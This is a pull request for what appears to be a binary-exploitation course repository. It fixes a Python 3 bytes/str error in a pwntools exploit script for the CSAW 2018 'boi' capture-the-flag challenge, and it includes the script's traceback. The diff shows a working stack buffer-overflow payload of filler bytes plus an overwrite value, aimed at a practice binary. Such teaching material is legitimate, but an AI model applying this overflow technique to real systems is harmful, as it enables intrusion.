### PR TITLE
Bug fix: concatenation error in 04-bof_variable/csaw18_boi/exploit.py

### DIFF
--- a/modules/04-bof_variable/csaw18_boi/exploit.py
+++ b/modules/04-bof_variable/csaw18_boi/exploit.py
@@ -8,7 +8,7 @@ target = process('./boi')
 # 0x14 bytes of filler data to fill the gap between the start of our input
 # and the target int
 # 0x4 byte int we will overwrite target with
-payload = "0"*0x14 + p32(0xcaf3baee)
+payload = bytes("0"*0x14, "utf-8") + p32(0xcaf3baee)
 
 # Send the payload
 target.send(payload)


### PR DESCRIPTION
I have encountered the following error when running `exploit.py` for 04-bof_variable/csaw18_boi, and am submitting a fix.

```console
vilroi@nightmare:~/nightmare/modules/04-bof_variable/csaw18_boi$ python3 exploit.py 
[+] Starting local process './boi': pid 6900
Traceback (most recent call last):
  File "/home/vilroi/nightmare/modules/04-bof_variable/csaw18_boi/exploit.py", line 11, in <module>
    payload = "0"*0x14  + p32(0xcaf3baee)
              ~~~~~~~~~~^~~~~~~~~~~~~~~~~
TypeError: can only concatenate str (not "bytes") to str
[*] Stopped process './boi' (pid 6900)
```